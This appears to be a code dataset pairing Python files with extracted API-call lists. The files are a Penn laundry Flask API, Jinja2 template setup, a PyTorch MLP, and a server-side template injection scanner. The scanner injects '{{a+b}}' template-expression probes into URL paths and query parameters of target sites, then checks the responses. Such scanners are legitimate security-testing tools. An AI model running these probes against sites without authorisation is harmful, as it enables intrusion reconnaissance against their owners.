[((3932, 3952), 'numpy.argmin', 'np.argmin', (['time_size'], {}), '(time_size)\n', (3941, 3952), True, 'import numpy as np\n'), ((4035, 4057), 'numpy.argmin', 'np.argmin', (['energy_size'], {}), '(energy_size)\n', (4044, 4057), True, 'import numpy as np\n'), ((4408, 4443), 'pytplot.get_data', 'get_data', (['omni_vars[reftime_sc_loc]'], {}), '(omni_vars[reftime_sc_loc])\n', (4416, 4443), False, 'from pytplot import get_data, store_data, options\n'), ((4474, 4511), 'pytplot.get_data', 'get_data', (['omni_vars[refenergy_sc_loc]'], {}), '(omni_vars[refenergy_sc_loc])\n', (4482, 4511), False, 'from pytplot import get_data, store_data, options\n'), ((5873, 5968), 'pytplot.store_data', 'store_data', (['new_name'], {'data': "{'x': time_refprobe[0], 'y': omni_spec, 'v': energy_refprobe[2]}"}), "(new_name, data={'x': time_refprobe[0], 'y': omni_spec, 'v':\n energy_refprobe[2]})\n", (5883, 5968), False, 'from pytplot import get_data, store_data, options\n'), ((5974, 6005), 'pytplot.options', 'options', (['new_name', '"""ylog"""', '(True)'], {}), "(new_name, 'ylog', True)\n", (5981, 6005), False, 'from pytplot import get_data, store_data, options\n'), ((6018, 6049), 'pytplot.options', 'options', (['new_name', '"""zlog"""', '(True)'], {}), "(new_name, 'zlog', True)\n", (6025, 6049), False, 'from pytplot import get_data, store_data, options\n'), ((6062, 6093), 'pytplot.options', 'options', (['new_name', '"""spec"""', '(True)'], {}), "(new_name, 'spec', True)\n", (6069, 6093), False, 'from pytplot import get_data, store_data, options\n'), ((6106, 6142), 'pytplot.options', 'options', (['new_name', '"""Colormap"""', '"""jet"""'], {}), "(new_name, 'Colormap', 'jet')\n", (6113, 6142), False, 'from pytplot import get_data, store_data, options\n'), ((6155, 6195), 'pytplot.options', 'options', (['new_name', '"""ztitle"""', 'units_label'], {}), "(new_name, 'ztitle', units_label)\n", (6162, 6195), False, 'from pytplot import get_data, store_data, options\n'), ((6404, 6438), 'pytplot.get_data', 'get_data', (["(prefix + 'spin' + suffix)"], {}), "(prefix + 'spin' + suffix)\n", (6412, 6438), False, 'from pytplot import get_data, store_data, options\n'), ((6653, 6695), 'numpy.unique', 'np.unique', (['spin_nums[1]'], {'return_index': '(True)'}), '(spin_nums[1], return_index=True)\n', (6662, 6695), True, 'import numpy as np\n'), ((7136, 7244), 'pytplot.store_data', 'store_data', (['new_name'], {'data': "{'x': spin_nums[0][spin_starts], 'y': spin_sum_flux, 'v': energy_refprobe[2]}"}), "(new_name, data={'x': spin_nums[0][spin_starts], 'y':\n spin_sum_flux, 'v': energy_refprobe[2]})\n", (7146, 7244), False, 'from pytplot import get_data, store_data, options\n'), ((7250, 7281), 'pytplot.options', 'options', (['new_name', '"""spec"""', '(True)'], {}), "(new_name, 'spec', True)\n", (7257, 7281), False, 'from pytplot import get_data, store_data, options\n'), ((7294, 7325), 'pytplot.options', 'options', (['new_name', '"""zlog"""', '(True)'], {}), "(new_name, 'zlog', True)\n", (7301, 7325), False, 'from pytplot import get_data, store_data, options\n'), ((7338, 7369), 'pytplot.options', 'options', (['new_name', '"""ylog"""', '(True)'], {}), "(new_name, 'ylog', True)\n", (7345, 7369), False, 'from pytplot import get_data, store_data, options\n'), ((7382, 7413), 'pytplot.options', 'options', (['new_name', '"""spec"""', '(True)'], {}), "(new_name, 'spec', True)\n", (7389, 7413), False, 'from pytplot import get_data, store_data, options\n'), ((3780, 3802), 'pytplot.get_data', 'get_data', (['omni_vars[p]'], {}), '(omni_vars[p])\n', (3788, 3802), False, 'from pytplot import get_data, store_data, options\n'), ((5133, 5156), 'pytplot.get_data', 'get_data', (['omni_vars[pp]'], {}), '(omni_vars[pp])\n', (5141, 5156), False, 'from pytplot import get_data, store_data, options\n'), ((5766, 5785), 'numpy.isnan', 'np.isnan', (['omni_spec'], {}), '(omni_spec)\n', (5774, 5785), True, 'import numpy as np\n')]
|
import calendar
import datetime
from flask import g, jsonify, request
from pytz import timezone
from requests.exceptions import HTTPError
from sqlalchemy import Integer, cast, exists, func
from server import app, sqldb
from server.auth import auth
from server.base import cached_route
from server.models import LaundryPreference, LaundrySnapshot, User
from server.penndata import laundry
@app.route("/laundry/halls", methods=["GET"])
def all_halls():
try:
return jsonify({"halls": laundry.all_status()})
except HTTPError:
return jsonify({"error": "The laundry api is currently unavailable."})
@app.route("/laundry/rooms/<hall_ids>", methods=["GET"])
def get_rooms(hall_ids):
est = timezone("EST")
date = datetime.datetime.now(est)
halls = [int(x) for x in hall_ids.split(",")]
output = {"rooms": []}
for hall in halls:
hall_data = laundry.hall_status(hall)
hall_data["id"] = hall
hall_data["usage_data"] = usage_data(hall, date.year, date.month, date.day)
output["rooms"].append(hall_data)
return jsonify(output)
@app.route("/laundry/hall/<int:hall_id>", methods=["GET"])
def hall(hall_id):
try:
return jsonify(laundry.hall_status(hall_id))
except ValueError:
return jsonify({"error": "Invalid hall id passed to server."})
except HTTPError:
return jsonify({"error": "The laundry api is currently unavailable."})
@app.route("/laundry/hall/<int:hall_id>/<int:hall_id2>", methods=["GET"])
def two_halls(hall_id, hall_id2):
try:
to_ret = {"halls": [laundry.hall_status(hall_id), laundry.hall_status(hall_id2)]}
return jsonify(to_ret)
except ValueError:
return jsonify({"error": "Invalid hall id passed to server."})
except HTTPError:
return jsonify({"error": "The laundry api is currently unavailable."})
@app.route("/laundry/halls/ids", methods=["GET"])
def id_to_name():
try:
return jsonify({"halls": laundry.hall_id_list})
except HTTPError:
return jsonify({"error": "The laundry api is currently unavailable."})
def safe_division(a, b):
return round(a / float(b), 3) if b > 0 else 0
@app.route("/laundry/usage/<int:hall_no>")
def usage_shortcut(hall_no):
est = timezone("EST")
now = datetime.datetime.now(est)
return usage(hall_no, now.year, now.month, now.day)
def usage_data(hall_no, year, month, day):
# turn date info into a date object
# find start range by subtracting 30 days
now = datetime.date(year, month, day)
start = now - datetime.timedelta(days=30)
# get the current day of the week for today and tomorrow
# python dow is monday = 0, while sql dow is sunday = 0
dow = (now.weekday() + 1) % 7
tmw = (dow + 1) % 7
# some commands are different between mysql and sqlite
is_mysql = sqldb.engine.name == "mysql"
# get the laundry information for today based on the day
# of week (if today is tuesday, get all the tuesdays
# in the past 30 days), group them by time, and include
# the first 2 hours of the next day
data = (
sqldb.session.query(
LaundrySnapshot.date,
(
func.floor(LaundrySnapshot.time / 60).label("time")
if is_mysql
else cast(LaundrySnapshot.time / 60, Integer).label("time")
),
func.avg(LaundrySnapshot.washers).label("all_washers"),
func.avg(LaundrySnapshot.dryers).label("all_dryers"),
func.avg(LaundrySnapshot.total_washers).label("all_total_washers"),
func.avg(LaundrySnapshot.total_dryers).label("all_total_dryers"),
)
.filter(
(
(LaundrySnapshot.room == hall_no)
& (
(
func.dayofweek(LaundrySnapshot.date) == dow + 1
if is_mysql
else func.strftime("%w", LaundrySnapshot.date) == str(dow)
)
| (
(LaundrySnapshot.time <= 180 - 1)
& (
func.dayofweek(LaundrySnapshot.date) == tmw + 1
if is_mysql
else func.strftime("%w", LaundrySnapshot.date) == str(tmw)
)
)
)
& (LaundrySnapshot.date >= start)
)
)
.group_by(LaundrySnapshot.date, "time")
.order_by(LaundrySnapshot.date, "time")
.all()
)
data = [x._asdict() for x in data]
all_dryers = [int(x["all_total_dryers"]) for x in data]
all_washers = [int(x["all_total_washers"]) for x in data]
washer_points = {k: 0 for k in range(27)}
dryer_points = {k: 0 for k in range(27)}
washer_total = {k: 0 for k in range(27)}
dryer_total = {k: 0 for k in range(27)}
for x in data:
hour = int(x["time"])
# if the value is for tomorrow, add 24 hours
if x["date"].weekday() != now.weekday():
hour += 24
washer_points[hour] += int(x["all_washers"])
dryer_points[hour] += int(x["all_dryers"])
washer_total[hour] += 1
dryer_total[hour] += 1
dates = [x["date"] for x in data]
if not dates:
dates = [now]
return {
"hall_name": laundry.id_to_hall[hall_no],
"location": laundry.id_to_location[hall_no],
"day_of_week": calendar.day_name[now.weekday()],
"start_date": min(dates).strftime("%Y-%m-%d"),
"end_date": max(dates).strftime("%Y-%m-%d"),
"total_number_of_dryers": safe_division(sum(all_dryers), len(all_dryers)),
"total_number_of_washers": safe_division(sum(all_washers), len(all_washers)),
"washer_data": {x: safe_division(washer_points[x], washer_total[x]) for x in washer_points},
"dryer_data": {x: safe_division(dryer_points[x], dryer_total[x]) for x in dryer_points},
}
@app.route("/laundry/usage/<int:hall_no>/<int:year>-<int:month>-<int:day>", methods=["GET"])
def usage(hall_no, year, month, day):
def get_data():
return usage_data(hall_no, year, month, day)
td = datetime.timedelta(minutes=15)
return cached_route("laundry:usage:%s:%s-%s-%s" % (hall_no, year, month, day), td, get_data)
def save_data():
"""Retrieves current laundry info and saves it into the database."""
# get the number of minutes since midnight
est = timezone("EST")
now = datetime.datetime.now(est)
midnight = now.replace(hour=0, minute=0, second=0, microsecond=0)
date = now.date()
time = round((now - midnight).seconds / 60)
# check if we already have data for this minute
# if we do, skip
with app.app_context():
if sqldb.session.query(
exists().where((LaundrySnapshot.date == date) & (LaundrySnapshot.time == time))
).scalar():
return
# make a dict for hall name -> id
ids = {x["hall_name"]: x["id"] for x in laundry.hall_id_list}
data = laundry.all_status()
for name, room in data.items():
id = ids[name]
dryers = room["dryers"]["open"]
washers = room["washers"]["open"]
total_dryers = sum(
[room["dryers"][x] for x in ["open", "running", "offline", "out_of_order"]]
)
total_washers = sum(
[room["washers"][x] for x in ["open", "running", "offline", "out_of_order"]]
)
item = LaundrySnapshot(
date=date,
time=time,
room=id,
washers=washers,
dryers=dryers,
total_washers=total_washers,
total_dryers=total_dryers,
)
sqldb.session.add(item)
sqldb.session.commit()
@app.route("/laundry/preferences", methods=["POST"])
@auth(nullable=True)
def save_laundry_preferences():
try:
user = User.get_or_create()
except ValueError as e:
return jsonify({"success": False, "error": str(e)})
room_ids = request.form.get("rooms")
if not room_ids:
return jsonify({"success": False, "error": "No rooms specified."})
# delete old preferences for user
LaundryPreference.query.filter_by(user_id=user.id).delete()
room_ids = [int(x) for x in room_ids.split(",")]
account_id = g.account.id if g.account else None
for room_id in room_ids:
laundry_preference = LaundryPreference(user_id=user.id, account=account_id, room_id=room_id)
sqldb.session.add(laundry_preference)
sqldb.session.commit()
return jsonify({"success": True, "error": None})
@app.route("/laundry/preferences", methods=["GET"])
def get_laundry_preferences():
try:
user = User.get_or_create()
except ValueError:
return jsonify({"rooms": []})
preferences = LaundryPreference.query.filter_by(user_id=user.id)
room_ids = [x.room_id for x in preferences]
return jsonify({"rooms": room_ids})
@app.route("/laundry/status", methods=["GET"])
def get_laundry_status():
def get_data():
if laundry.check_is_working():
return {"is_working": True, "error_msg": None}
else:
error_msg = "Penn's laundry server is currently not updating. We hope this will be fixed shortly."
return {"is_working": False, "error_msg": error_msg}
td = datetime.timedelta(hours=1)
return cached_route("laundry:working", td, get_data)
|
[
"flask.request.form.get",
"server.models.LaundryPreference",
"server.penndata.laundry.all_status",
"flask.jsonify",
"server.penndata.laundry.check_is_working",
"server.sqldb.session.commit",
"server.auth.auth",
"server.penndata.laundry.hall_status",
"server.app.route",
"server.app.app_context",
"server.models.LaundryPreference.query.filter_by",
"datetime.timedelta",
"server.models.LaundrySnapshot",
"sqlalchemy.func.avg",
"datetime.datetime.now",
"sqlalchemy.exists",
"datetime.date",
"server.models.User.get_or_create",
"sqlalchemy.cast",
"server.base.cached_route",
"sqlalchemy.func.strftime",
"server.sqldb.session.add",
"sqlalchemy.func.floor",
"pytz.timezone",
"sqlalchemy.func.dayofweek"
] |
[((393, 437), 'server.app.route', 'app.route', (['"""/laundry/halls"""'], {'methods': "['GET']"}), "('/laundry/halls', methods=['GET'])\n", (402, 437), False, 'from server import app, sqldb\n'), ((624, 679), 'server.app.route', 'app.route', (['"""/laundry/rooms/<hall_ids>"""'], {'methods': "['GET']"}), "('/laundry/rooms/<hall_ids>', methods=['GET'])\n", (633, 679), False, 'from server import app, sqldb\n'), ((1102, 1159), 'server.app.route', 'app.route', (['"""/laundry/hall/<int:hall_id>"""'], {'methods': "['GET']"}), "('/laundry/hall/<int:hall_id>', methods=['GET'])\n", (1111, 1159), False, 'from server import app, sqldb\n'), ((1439, 1511), 'server.app.route', 'app.route', (['"""/laundry/hall/<int:hall_id>/<int:hall_id2>"""'], {'methods': "['GET']"}), "('/laundry/hall/<int:hall_id>/<int:hall_id2>', methods=['GET'])\n", (1448, 1511), False, 'from server import app, sqldb\n'), ((1874, 1922), 'server.app.route', 'app.route', (['"""/laundry/halls/ids"""'], {'methods': "['GET']"}), "('/laundry/halls/ids', methods=['GET'])\n", (1883, 1922), False, 'from server import app, sqldb\n'), ((2187, 2228), 'server.app.route', 'app.route', (['"""/laundry/usage/<int:hall_no>"""'], {}), "('/laundry/usage/<int:hall_no>')\n", (2196, 2228), False, 'from server import app, sqldb\n'), ((6001, 6096), 'server.app.route', 'app.route', (['"""/laundry/usage/<int:hall_no>/<int:year>-<int:month>-<int:day>"""'], {'methods': "['GET']"}), "('/laundry/usage/<int:hall_no>/<int:year>-<int:month>-<int:day>',\n methods=['GET'])\n", (6010, 6096), False, 'from server import app, sqldb\n'), ((7885, 7936), 'server.app.route', 'app.route', (['"""/laundry/preferences"""'], {'methods': "['POST']"}), "('/laundry/preferences', methods=['POST'])\n", (7894, 7936), False, 'from server import app, sqldb\n'), ((7938, 7957), 'server.auth.auth', 'auth', ([], {'nullable': '(True)'}), '(nullable=True)\n', (7942, 7957), False, 'from server.auth import auth\n'), ((8733, 8783), 'server.app.route', 'app.route', (['"""/laundry/preferences"""'], {'methods': "['GET']"}), "('/laundry/preferences', methods=['GET'])\n", (8742, 8783), False, 'from server import app, sqldb\n'), ((9082, 9127), 'server.app.route', 'app.route', (['"""/laundry/status"""'], {'methods': "['GET']"}), "('/laundry/status', methods=['GET'])\n", (9091, 9127), False, 'from server import app, sqldb\n'), ((715, 730), 'pytz.timezone', 'timezone', (['"""EST"""'], {}), "('EST')\n", (723, 730), False, 'from pytz import timezone\n'), ((742, 768), 'datetime.datetime.now', 'datetime.datetime.now', (['est'], {}), '(est)\n', (763, 768), False, 'import datetime\n'), ((1083, 1098), 'flask.jsonify', 'jsonify', (['output'], {}), '(output)\n', (1090, 1098), False, 'from flask import g, jsonify, request\n'), ((2268, 2283), 'pytz.timezone', 'timezone', (['"""EST"""'], {}), "('EST')\n", (2276, 2283), False, 'from pytz import timezone\n'), ((2294, 2320), 'datetime.datetime.now', 'datetime.datetime.now', (['est'], {}), '(est)\n', (2315, 2320), False, 'import datetime\n'), ((2518, 2549), 'datetime.date', 'datetime.date', (['year', 'month', 'day'], {}), '(year, month, day)\n', (2531, 2549), False, 'import datetime\n'), ((6214, 6244), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': '(15)'}), '(minutes=15)\n', (6232, 6244), False, 'import datetime\n'), ((6256, 6345), 'server.base.cached_route', 'cached_route', (["('laundry:usage:%s:%s-%s-%s' % (hall_no, year, month, day))", 'td', 'get_data'], {}), "('laundry:usage:%s:%s-%s-%s' % (hall_no, year, month, day), td,\n get_data)\n", (6268, 6345), False, 'from server.base import cached_route\n'), ((6492, 6507), 'pytz.timezone', 'timezone', (['"""EST"""'], {}), "('EST')\n", (6500, 6507), False, 'from pytz import timezone\n'), ((6518, 6544), 'datetime.datetime.now', 'datetime.datetime.now', (['est'], {}), '(est)\n', (6539, 6544), False, 'import datetime\n'), ((8139, 8164), 'flask.request.form.get', 'request.form.get', (['"""rooms"""'], {}), "('rooms')\n", (8155, 8164), False, 'from flask import g, jsonify, request\n'), ((8653, 8675), 'server.sqldb.session.commit', 'sqldb.session.commit', ([], {}), '()\n', (8673, 8675), False, 'from server import app, sqldb\n'), ((8688, 8729), 'flask.jsonify', 'jsonify', (["{'success': True, 'error': None}"], {}), "({'success': True, 'error': None})\n", (8695, 8729), False, 'from flask import g, jsonify, request\n'), ((8940, 8990), 'server.models.LaundryPreference.query.filter_by', 'LaundryPreference.query.filter_by', ([], {'user_id': 'user.id'}), '(user_id=user.id)\n', (8973, 8990), False, 'from server.models import LaundryPreference, LaundrySnapshot, User\n'), ((9050, 9078), 'flask.jsonify', 'jsonify', (["{'rooms': room_ids}"], {}), "({'rooms': room_ids})\n", (9057, 9078), False, 'from flask import g, jsonify, request\n'), ((9472, 9499), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(1)'}), '(hours=1)\n', (9490, 9499), False, 'import datetime\n'), ((9511, 9556), 'server.base.cached_route', 'cached_route', (['"""laundry:working"""', 'td', 'get_data'], {}), "('laundry:working', td, get_data)\n", (9523, 9556), False, 'from server.base import cached_route\n'), ((889, 914), 'server.penndata.laundry.hall_status', 'laundry.hall_status', (['hall'], {}), '(hall)\n', (908, 914), False, 'from server.penndata import laundry\n'), ((1660, 1675), 'flask.jsonify', 'jsonify', (['to_ret'], {}), '(to_ret)\n', (1667, 1675), False, 'from flask import g, jsonify, request\n'), ((1965, 2005), 'flask.jsonify', 'jsonify', (["{'halls': laundry.hall_id_list}"], {}), "({'halls': laundry.hall_id_list})\n", (1972, 2005), False, 'from flask import g, jsonify, request\n'), ((2568, 2595), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(30)'}), '(days=30)\n', (2586, 2595), False, 'import datetime\n'), ((6768, 6785), 'server.app.app_context', 'app.app_context', ([], {}), '()\n', (6783, 6785), False, 'from server import app, sqldb\n'), ((7078, 7098), 'server.penndata.laundry.all_status', 'laundry.all_status', ([], {}), '()\n', (7096, 7098), False, 'from server.penndata import laundry\n'), ((7859, 7881), 'server.sqldb.session.commit', 'sqldb.session.commit', ([], {}), '()\n', (7879, 7881), False, 'from server import app, sqldb\n'), ((8014, 8034), 'server.models.User.get_or_create', 'User.get_or_create', ([], {}), '()\n', (8032, 8034), False, 'from server.models import LaundryPreference, LaundrySnapshot, User\n'), ((8202, 8261), 'flask.jsonify', 'jsonify', (["{'success': False, 'error': 'No rooms specified.'}"], {}), "({'success': False, 'error': 'No rooms specified.'})\n", (8209, 8261), False, 'from flask import g, jsonify, request\n'), ((8531, 8602), 'server.models.LaundryPreference', 'LaundryPreference', ([], {'user_id': 'user.id', 'account': 'account_id', 'room_id': 'room_id'}), '(user_id=user.id, account=account_id, room_id=room_id)\n', (8548, 8602), False, 'from server.models import LaundryPreference, LaundrySnapshot, User\n'), ((8611, 8648), 'server.sqldb.session.add', 'sqldb.session.add', (['laundry_preference'], {}), '(laundry_preference)\n', (8628, 8648), False, 'from server import app, sqldb\n'), ((8839, 8859), 'server.models.User.get_or_create', 'User.get_or_create', ([], {}), '()\n', (8857, 8859), False, 'from server.models import LaundryPreference, LaundrySnapshot, User\n'), ((9185, 9211), 'server.penndata.laundry.check_is_working', 'laundry.check_is_working', ([], {}), '()\n', (9209, 9211), False, 'from server.penndata import laundry\n'), ((557, 620), 'flask.jsonify', 'jsonify', (["{'error': 'The laundry api is currently unavailable.'}"], {}), "({'error': 'The laundry api is currently unavailable.'})\n", (564, 620), False, 'from flask import g, jsonify, request\n'), ((1211, 1239), 'server.penndata.laundry.hall_status', 'laundry.hall_status', (['hall_id'], {}), '(hall_id)\n', (1230, 1239), False, 'from server.penndata import laundry\n'), ((1279, 1334), 'flask.jsonify', 'jsonify', (["{'error': 'Invalid hall id passed to server.'}"], {}), "({'error': 'Invalid hall id passed to server.'})\n", (1286, 1334), False, 'from flask import g, jsonify, request\n'), ((1372, 1435), 'flask.jsonify', 'jsonify', (["{'error': 'The laundry api is currently unavailable.'}"], {}), "({'error': 'The laundry api is currently unavailable.'})\n", (1379, 1435), False, 'from flask import g, jsonify, request\n'), ((1714, 1769), 'flask.jsonify', 'jsonify', (["{'error': 'Invalid hall id passed to server.'}"], {}), "({'error': 'Invalid hall id passed to server.'})\n", (1721, 1769), False, 'from flask import g, jsonify, request\n'), ((1807, 1870), 'flask.jsonify', 'jsonify', (["{'error': 'The laundry api is currently unavailable.'}"], {}), "({'error': 'The laundry api is currently unavailable.'})\n", (1814, 1870), False, 'from flask import g, jsonify, request\n'), ((2043, 2106), 'flask.jsonify', 'jsonify', (["{'error': 'The laundry api is currently unavailable.'}"], {}), "({'error': 'The laundry api is currently unavailable.'})\n", (2050, 2106), False, 'from flask import g, jsonify, request\n'), ((7553, 7692), 'server.models.LaundrySnapshot', 'LaundrySnapshot', ([], {'date': 'date', 'time': 'time', 'room': 'id', 'washers': 'washers', 'dryers': 'dryers', 'total_washers': 'total_washers', 'total_dryers': 'total_dryers'}), '(date=date, time=time, room=id, washers=washers, dryers=\n dryers, total_washers=total_washers, total_dryers=total_dryers)\n', (7568, 7692), False, 'from server.models import LaundryPreference, LaundrySnapshot, User\n'), ((7827, 7850), 'server.sqldb.session.add', 'sqldb.session.add', (['item'], {}), '(item)\n', (7844, 7850), False, 'from server import app, sqldb\n'), ((8305, 8355), 'server.models.LaundryPreference.query.filter_by', 'LaundryPreference.query.filter_by', ([], {'user_id': 'user.id'}), '(user_id=user.id)\n', (8338, 8355), False, 'from server.models import LaundryPreference, LaundrySnapshot, User\n'), ((8898, 8920), 'flask.jsonify', 'jsonify', (["{'rooms': []}"], {}), "({'rooms': []})\n", (8905, 8920), False, 'from flask import g, jsonify, request\n'), ((497, 517), 'server.penndata.laundry.all_status', 'laundry.all_status', ([], {}), '()\n', (515, 517), False, 'from server.penndata import laundry\n'), ((1583, 1611), 'server.penndata.laundry.hall_status', 'laundry.hall_status', (['hall_id'], {}), '(hall_id)\n', (1602, 1611), False, 'from server.penndata import laundry\n'), ((1613, 1642), 'server.penndata.laundry.hall_status', 'laundry.hall_status', (['hall_id2'], {}), '(hall_id2)\n', (1632, 1642), False, 'from server.penndata import laundry\n'), ((6831, 6839), 'sqlalchemy.exists', 'exists', ([], {}), '()\n', (6837, 6839), False, 'from sqlalchemy import Integer, cast, exists, func\n'), ((3388, 3421), 'sqlalchemy.func.avg', 'func.avg', (['LaundrySnapshot.washers'], {}), '(LaundrySnapshot.washers)\n', (3396, 3421), False, 'from sqlalchemy import Integer, cast, exists, func\n'), ((3456, 3488), 'sqlalchemy.func.avg', 'func.avg', (['LaundrySnapshot.dryers'], {}), '(LaundrySnapshot.dryers)\n', (3464, 3488), False, 'from sqlalchemy import Integer, cast, exists, func\n'), ((3522, 3561), 'sqlalchemy.func.avg', 'func.avg', (['LaundrySnapshot.total_washers'], {}), '(LaundrySnapshot.total_washers)\n', (3530, 3561), False, 'from sqlalchemy import Integer, cast, exists, func\n'), ((3602, 3640), 'sqlalchemy.func.avg', 'func.avg', (['LaundrySnapshot.total_dryers'], {}), '(LaundrySnapshot.total_dryers)\n', (3610, 3640), False, 'from sqlalchemy import Integer, cast, exists, func\n'), ((3205, 3242), 'sqlalchemy.func.floor', 'func.floor', (['(LaundrySnapshot.time / 60)'], {}), '(LaundrySnapshot.time / 60)\n', (3215, 3242), False, 'from sqlalchemy import Integer, cast, exists, func\n'), ((3306, 3346), 'sqlalchemy.cast', 'cast', (['(LaundrySnapshot.time / 60)', 'Integer'], {}), '(LaundrySnapshot.time / 60, Integer)\n', (3310, 3346), False, 'from sqlalchemy import Integer, cast, exists, func\n'), ((3825, 3861), 'sqlalchemy.func.dayofweek', 'func.dayofweek', (['LaundrySnapshot.date'], {}), '(LaundrySnapshot.date)\n', (3839, 3861), False, 'from sqlalchemy import Integer, cast, exists, func\n'), ((3938, 3979), 'sqlalchemy.func.strftime', 'func.strftime', (['"""%w"""', 'LaundrySnapshot.date'], {}), "('%w', LaundrySnapshot.date)\n", (3951, 3979), False, 'from sqlalchemy import Integer, cast, exists, func\n'), ((4152, 4188), 'sqlalchemy.func.dayofweek', 'func.dayofweek', (['LaundrySnapshot.date'], {}), '(LaundrySnapshot.date)\n', (4166, 4188), False, 'from sqlalchemy import Integer, cast, exists, func\n'), ((4273, 4314), 'sqlalchemy.func.strftime', 'func.strftime', (['"""%w"""', 'LaundrySnapshot.date'], {}), "('%w', LaundrySnapshot.date)\n", (4286, 4314), False, 'from sqlalchemy import Integer, cast, exists, func\n')]
|
import jinja2
veg_cost = 10.00
non_veg_cost = 10.00
JINJA_ENVIRONMENT = jinja2.Environment(
# templates directory is relative to app root.
loader=jinja2.FileSystemLoader('templates'),
extensions=['jinja2.ext.autoescape'],
autoescape=True)
form_template = JINJA_ENVIRONMENT.get_template('form.html')
pay_template = JINJA_ENVIRONMENT.get_template('paypal.html')
thankyou_template = JINJA_ENVIRONMENT.get_template('thankyou.html')
cancel_template = JINJA_ENVIRONMENT.get_template('cancel.html')
step_by_step_template = JINJA_ENVIRONMENT.get_template('stepbystep.html')
email_template = JINJA_ENVIRONMENT.get_template('email_template.html')
list_template = JINJA_ENVIRONMENT.get_template('list.html')
index_template = JINJA_ENVIRONMENT.get_template('index.html')
|
[
"jinja2.FileSystemLoader"
] |
[((152, 188), 'jinja2.FileSystemLoader', 'jinja2.FileSystemLoader', (['"""templates"""'], {}), "('templates')\n", (175, 188), False, 'import jinja2\n')]
|
# coding:utf-8
import logging
from urllib import parse
from copy import deepcopy
import random
import requests
class SSTIDetector:
def __init__(self, results, reports, **kwargs):
self.results = results
self.reports = reports
self.args = kwargs
self.vulnerable = []
@staticmethod
def meta():
return {
'name': 'Server-Side Template Injector for all',
'version': '1.0'
}
@staticmethod
def set_payload():
randint1 = random.randint(32768, 65536)
randint2 = random.randint(16384, 32768)
_sum = randint1 + randint2
_payload = '{{' + str(randint1) + '+' + str(randint2) + '}}'
check_str = str(_sum)
return {'payload': _payload, 'check_str': check_str}
def exec(self):
headers = {
'User_Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.'
'2924.87 Safari/537.36'
}
for url in self.results['urls']:
logging.critical('SSTI testing on {}'.format(url))
attack_url = []
if url[0:4] != 'http':
url = 'http://' + url
parse_result = parse.urlparse(url)
query = parse.parse_qs(parse_result.query)
split_dir = parse_result.path.split('/')
_url = parse_result.scheme + '://' + parse_result.netloc
for i in range(1, len(split_dir)):
payload = self.set_payload()
split = deepcopy(split_dir)
split[i] = payload['payload']
check_url = _url + '/'.join(split)
attack_url.append({'url': check_url, 'payload': payload})
_url += parse_result.path + '?'
for key in query.keys():
payload = self.set_payload()
tmp = deepcopy(query)
tmp[key][0] = payload['payload']
_query = []
for _key, _value in tmp.items():
_query += list(map(lambda x: '{}={}'.format(_key, x), _value))
attack_url.append({'url': _url + '&'.join(_query), 'payload': payload})
for test_url in attack_url:
req = requests.get(test_url['url'], headers=headers)
if req.text.find(test_url['payload']['check_str']) != -1:
logging.critical('SSTI detected: vulnerable url: {}'.format(test_url['url']))
self.vulnerable.append({
'url': test_url['url'],
'payload': test_url['payload']['payload']
})
self.reports.append({
'title': 'Server Side Template Injection Points',
'overview': 'Found {} SSTI point(s)'.format(len(self.vulnerable)),
'header': ['Path', 'Payload'],
'entries': list(map(lambda x: [x['url'], x['payload']], self.vulnerable))
})
logging.info("SSTI scan finished!")
|
[
"copy.deepcopy",
"random.randint",
"urllib.parse.parse_qs",
"logging.info",
"requests.get",
"urllib.parse.urlparse"
] |
[((518, 546), 'random.randint', 'random.randint', (['(32768)', '(65536)'], {}), '(32768, 65536)\n', (532, 546), False, 'import random\n'), ((566, 594), 'random.randint', 'random.randint', (['(16384)', '(32768)'], {}), '(16384, 32768)\n', (580, 594), False, 'import random\n'), ((2999, 3034), 'logging.info', 'logging.info', (['"""SSTI scan finished!"""'], {}), "('SSTI scan finished!')\n", (3011, 3034), False, 'import logging\n'), ((1246, 1265), 'urllib.parse.urlparse', 'parse.urlparse', (['url'], {}), '(url)\n', (1260, 1265), False, 'from urllib import parse\n'), ((1286, 1320), 'urllib.parse.parse_qs', 'parse.parse_qs', (['parse_result.query'], {}), '(parse_result.query)\n', (1300, 1320), False, 'from urllib import parse\n'), ((1561, 1580), 'copy.deepcopy', 'deepcopy', (['split_dir'], {}), '(split_dir)\n', (1569, 1580), False, 'from copy import deepcopy\n'), ((1902, 1917), 'copy.deepcopy', 'deepcopy', (['query'], {}), '(query)\n', (1910, 1917), False, 'from copy import deepcopy\n'), ((2278, 2324), 'requests.get', 'requests.get', (["test_url['url']"], {'headers': 'headers'}), "(test_url['url'], headers=headers)\n", (2290, 2324), False, 'import requests\n')]
|
import torch
from torch import nn
import os
############################################
############################################
class MLP(nn.Module):
def __init__(self, input_size, output_size, n_layers, size, activation=torch.tanh, output_activation=None):
super(MLP, self).__init__()
self.activation = activation
self.output_activation = output_activation
self.layers = nn.ModuleList()
in_ = input_size
for i in range(n_layers):
self.layers.append(nn.Linear(in_, size))
in_ = size
self.layers.append(nn.Linear(size, output_size))
def forward(self, x):
for layer in self.layers:
x = self.activation(layer(x))
if not self.output_activation:
return x
else:
return self.output_activation(x)
############################################
############################################
def lrelu(x, leak=0.2):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * x + f2 * abs(x)
|
[
"torch.nn.Linear",
"torch.nn.ModuleList"
] |
[((416, 431), 'torch.nn.ModuleList', 'nn.ModuleList', ([], {}), '()\n', (429, 431), False, 'from torch import nn\n'), ((595, 623), 'torch.nn.Linear', 'nn.Linear', (['size', 'output_size'], {}), '(size, output_size)\n', (604, 623), False, 'from torch import nn\n'), ((522, 542), 'torch.nn.Linear', 'nn.Linear', (['in_', 'size'], {}), '(in_, size)\n', (531, 542), False, 'from torch import nn\n')]
|
#
# This source file is part of the EdgeDB open source project.
#
# Copyright 2016-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
